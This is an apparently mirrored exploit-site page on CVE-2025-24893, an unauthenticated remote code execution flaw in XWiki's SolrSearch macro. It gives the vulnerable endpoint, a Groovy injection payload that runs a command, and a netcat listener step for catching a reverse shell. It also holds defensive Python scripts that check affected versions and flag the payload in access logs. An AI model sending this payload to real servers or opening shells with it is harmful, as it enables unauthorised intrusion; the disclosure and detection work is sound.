## https://sploitus.com/exploit?id=C558BD70-1D0A-5175-B681-DC19927F031B
# CVE-2025-24893 - XWiki Unauthenticated RCE Exploit POC

> โš ๏ธ Unauthenticated Remote Code Execution in XWiki  
> ๐Ÿ› ๏ธ PoC implementation by [@dollarboysushil](https://dollarboysushil.com)

## 💡 Overview

**CVE-2025-24893** is a critical RCE vulnerability in [XWiki](https://xwiki.org), caused by unsafe Groovy expression handling inside the `SolrSearch` macro. An attacker can inject Groovy code through a crafted GET request, leading to **remote code execution** (no authentication required).

- **Severity:** Critical (CVSS 9.8)
- **Affected:** Versions prior to the patched releases 15.10.11, 16.4.1 and 16.5.0RC1
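Translating the affected range above into a branch-aware check is the first thing an asset owner needs, since a plain string comparison gets 16.5.0RC1 versus 16.5.0 wrong. The script below is an added example for this page, not XWiki's own code; it assumes version strings of the form `major.minor[.patch][RCn|Mn]` (with optional hyphens, as in `16.5.0-rc-1`), and the inventory it triages is constructed.

```python
import re

# Pre-release ordering: milestones sort before release candidates, which sort before the
# final build of the same number. None marks a final release.
PRE_RANK = {"M": 0, "RC": 1, None: 2}

_VERSION_RE = re.compile(
    r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-?(M|RC)-?(\d+))?$", re.IGNORECASE
)


def parse_version(text):
    """Turn an XWiki version string into a comparable tuple (assumed format, see lead-in)."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised XWiki version string: {text!r}")
    major, minor, patch, pre, pre_num = m.groups()
    pre = pre.upper() if pre else None
    return (int(major), int(minor), int(patch or 0), PRE_RANK[pre], int(pre_num or 0))


# Patched releases as listed on this page.
FIXED_15 = parse_version("15.10.11")
FIXED_16_4 = parse_version("16.4.1")
FIXED_16_5 = parse_version("16.5.0RC1")


def is_affected(version):
    """True if the given version predates the fix on its own release branch."""
    v = parse_version(version)
    major, minor = v[0], v[1]
    if major < 15:
        return True  # older than every fixed release listed
    if major == 15:
        return v < FIXED_15
    if major == 16 and minor < 5:
        return v < FIXED_16_4
    if major == 16 and minor == 5:
        return v < FIXED_16_5
    return False  # 16.6 and later ship with the fix


def triage(inventory):
    """Return the names of inventory entries running an affected version."""
    return [name for name, ver in inventory.items() if is_affected(ver)]


# Constructed inventory for demonstration; not from any real environment.
SAMPLE_INVENTORY = {
    "wiki-prod": "15.10.8",      # the version shown in the PoC section of this page
    "wiki-staging": "16.4.1",
    "wiki-lab": "16.5.0RC1",
    "wiki-legacy": "14.10.21",
    "wiki-new": "16.6.0",
}

if __name__ == "__main__":
    for host in triage(SAMPLE_INVENTORY):
        print(f"{host}: {SAMPLE_INVENTORY[host]} is affected, upgrade required")
```

Unparseable version strings raise rather than silently passing, so a host whose version cannot be read is surfaced for manual review instead of being reported as safe.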

---

## 🛠 Technical Breakdown

The vulnerability resides in the **`SolrSearch` macro** (`Main.SolrSearch`) of XWiki, which handles search input using unsafe Groovy evaluation. The macro fails to sanitize user-supplied input, allowing for **arbitrary code execution**.

### 🔥 Vulnerable Endpoint

```text
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
```

An attacker can inject Groovy code into the `text` parameter, which is evaluated server-side due to improper input handling within the macro system.

### 💥 Example Payload

```text
}}}{{async async=false}}{{groovy}}'id'.execute(){{/groovy}}{{/async}}
```

This leads to unauthenticated **Remote Code Execution (RCE)** on vulnerable XWiki instances.
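For detection, the endpoint and the payload shape shown above are enough to build a log rule: a request to the `SolrSearch` page whose decoded `text` parameter escapes the surrounding macro with `}}}` or invokes the `async`/`groovy` macros. The script below is an added example for this page, not part of the PoC or of XWiki; the marker list is an assumption derived from the payload above, and the log lines are constructed in combined-log format.

```python
import re
from urllib.parse import urlsplit, parse_qs, quote

# Path suffix of the endpoint shown on this page, matched case-insensitively so that any
# deployment prefix (/xwiki, /, ...) is covered.
SOLR_SEARCH_PATH = "/bin/get/main/solrsearch"

# Markers of the injection shape above (assumed indicator list): the "}}}" that closes the
# macro the search text lands in, followed by async/groovy macro invocations.
MARKERS = ("}}}", "{{async", "{{groovy", "{{/groovy")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def analyse_line(line):
    """Return a finding dict for a suspicious SolrSearch request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().rstrip("/").endswith(SOLR_SEARCH_PATH):
        return None
    # parse_qs undoes percent-encoding and '+', so markers are matched on the decoded text.
    params = parse_qs(parts.query, keep_blank_values=True)
    text = " ".join(params.get("text", []))
    hits = [mk for mk in MARKERS if mk in text.lower()]
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        "markers": hits,
        "text": text,
    }


def scan(lines):
    """Run analyse_line over an iterable of access-log lines and keep the findings."""
    return [f for f in map(analyse_line, lines) if f]


# Constructed sample log. The third line carries the payload quoted on this page,
# percent-encoded the way a client would send it.
PAGE_PAYLOAD = "}}}{{async async=false}}{{groovy}}'id'.execute(){{/groovy}}{{/async}}"
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Mar/2025:10:01:02 +0000] "GET /xwiki/bin/get/Main/SolrSearch'
    '?media=rss&text=quarterly+report HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [18/Mar/2025:10:01:09 +0000] "GET /xwiki/bin/view/Main/WebHome'
    ' HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Mar/2025:10:02:41 +0000] "GET /xwiki/bin/get/Main/SolrSearch'
    '?media=rss&text=' + quote(PAGE_PAYLOAD, safe="")
    + ' HTTP/1.1" 200 512 "-" "python-requests/2.32"',
    '203.0.113.7 - - [18/Mar/2025:10:02:42 +0000] "GET /xwiki/bin/get/Main/SolrSearch'
    '?text=%7B%7Bgroovy%7D%7D&media=rss HTTP/1.1" 200 512 "-" "curl/8.5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} markers={f['markers']}")
```

A hit means an injection attempt was logged, not that it succeeded; the status code alone does not settle that, so correlate with process creation or outbound connections from the XWiki host. The rule only sees what the access log records, so the same parameters sent in a POST body would not be visible here and need request-body logging or a WAF rule instead.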

### 🔬 Proof-of-Concept (PoC) Demonstration

#### 🧪 Target Environment

The vulnerable target is an XWiki instance running version `15.10.8`, which is affected by CVE-2025-24893.

![Vulnerable XWiki Interface](images/image.png)

---

#### 📡 Preparing the Listener

Start a Netcat listener on the attacker's machine to capture the reverse shell connection:

```bash
nc -lvnp 1337
```

![Netcat Listener Active on Port 1337](images/image1.png)

---

#### 🚀 Launching the Exploit

Run the exploit script `CVE-2025-24893-dbs.py` to deliver the Groovy-based RCE payload to the vulnerable XWiki endpoint.

![Running Exploit Script](images/image2.png)

---

#### 💻 Successful Remote Shell Access

Upon successful execution, the reverse shell will connect back to the listener, granting the attacker remote access to the server.

![Reverse Shell Acquired](images/image3.png)

---

### 📚 References

- OffSec Blog: [CVE-2025-24893 XWiki Groovy RCE](https://www.offsec.com/blog/cve-2025-24893/)
- NVD Entry: [CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)